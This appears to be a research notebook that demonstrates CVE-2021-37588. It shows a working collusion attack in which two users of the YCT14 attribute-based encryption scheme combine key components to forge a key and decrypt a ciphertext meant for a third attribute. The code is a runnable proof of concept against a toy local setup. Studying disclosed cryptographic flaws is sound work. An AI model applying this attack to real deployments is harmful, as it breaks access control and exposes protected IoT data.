# Attacking YCT14

Attack on the scheme of Yao et al. 2014 (YCT14)
presented on "Enhancement of a lightweight
attribute-based encryption scheme for the internet of things". Based on the collaboration of two
users of the system.
Performed according to CVE-2021-37588.

![title](img/yct14_main.png)


## Setup

In [None]:
from charm.schemes.abenc.abenc_yct14 import EKPabe                         
from charm.toolbox.pairinggroup import PairingGroup,ZR,G1,G2,GT,pair
from charm.toolbox.secretutil import SecretUtil
from charm.toolbox.symcrypto import SymmetricCryptoAbstraction
from charm.toolbox.ABEnc import ABEnc
from charm.schemes.abenc.abenc_lsw08 import KPabe
from charm.core.math.pairing import hashPair as extractor

from abeattacks import attack_yct14


## Example of standard use

We generate an universe of attributes based on an example IoT scenario with values TRANSPORT, MEDICAL and ENERGY.
We prepare a ciphertext with the policy TRANSPORT or MEDICAL and decrypt it.

In [None]:
group = PairingGroup('MNT224')
kpabe = EKPabe(group)
attributes = [ 'TRANSPORT', 'MEDICAL', 'ENERGY']

# setup

(master_public_key, master_key) = kpabe.setup(attributes)

# keygen

policy = '(TRANSPORT or MEDICAL)'
secret_key = kpabe.keygen(master_public_key, master_key, policy)

# encrypt

msg = b"Consumption:3532;Temperature:23;Distance:1"
cipher_text = kpabe.encrypt(master_public_key, msg, attributes)

# decrypt

decrypted_msg = kpabe.decrypt(cipher_text, secret_key)

print("Correctness of standard use:", decrypted_msg == msg)

# Presentation of the attack

Two users collaborate to decrypt a message encrypted with attribute x = TRANSPORT. These users have attribute y = MEDICAL and attribute z = ENERGY.


In [None]:

group = PairingGroup('MNT224')
kpabe = EKPabe(group)
attributes = [ 'TRANSPORT', 'MEDICAL', 'ENERGY']

(master_public_key, master_key) = kpabe.setup(attributes)

policy_y = '(MEDICAL)'
policy_z = '(ENERGY)'

# generation of decryption keys 

sk_y = kpabe.keygen(master_public_key, master_key, policy_y)
sk_z = kpabe.keygen(master_public_key, master_key, policy_z)

# generation of target cyphertext and decryption key for user x

policy_x = '(TRANSPORT)'
sk_x = kpabe.keygen(master_public_key, master_key, policy_x)
attr_target_ct = ['TRANSPORT']
msg = b"Distance:353;Model:ACG-E3"
target_ct = kpabe.encrypt(master_public_key, msg, attr_target_ct)


## Attack parameters

In [None]:
# attack parameters (public)

PK = master_public_key
p_x = kpabe.attribute['TRANSPORT']
p_y = kpabe.attribute['MEDICAL']
p_z = kpabe.attribute['ENERGY']


## Phase 1

x = TRANSPORT, y = MEDICAL, z = ENERGY

Users y and z collaborate to attack x. They ask for decryption keys
based on the following policies:

    - a1 = y or z
    - a2 = x and y
    - a3 = z or ( x and y)
 
NOTE: They can do this because they have at least one of the attributes
in the policy.

In [None]:
a_1 = '(MEDICAL or ENERGY)'
a_2 = '(TRANSPORT or MEDICAL)'
a_3 = 'ENERGY or (TRANSPORT and MEDICAL)'

d_a_1 = kpabe.keygen(master_public_key, master_key, a_1)
d_a_2 = kpabe.keygen(master_public_key, master_key, a_2)
d_a_3 = kpabe.keygen(master_public_key, master_key, a_3)



# Phase 2

In [None]:
d_y = d_a_1['Du']['MEDICAL']
d_z = d_a_1['Du']['ENERGY']
d_u_x = d_a_2['Du']['TRANSPORT']
d_u_y = d_a_2['Du']['MEDICAL']
d_u_x_prima = d_a_3['Du']['TRANSPORT']
d_u_y_prima = d_a_3['Du']['MEDICAL']

# We perform the attack

d_plus = attack_yct14.yct14_collude_function(d_y, d_z, d_u_x, d_u_y, d_u_x_prima, d_u_y_prima)

# We generate a powerful key

new_x = {'policy': '(TRANSPORT)', 'Du': {'TRANSPORT': d_plus}}
try_decrypt = kpabe.decrypt(target_ct, new_x);
assert(try_decrypt == msg)
print("DECRYPTION ATTACK SUCCESSFUL")
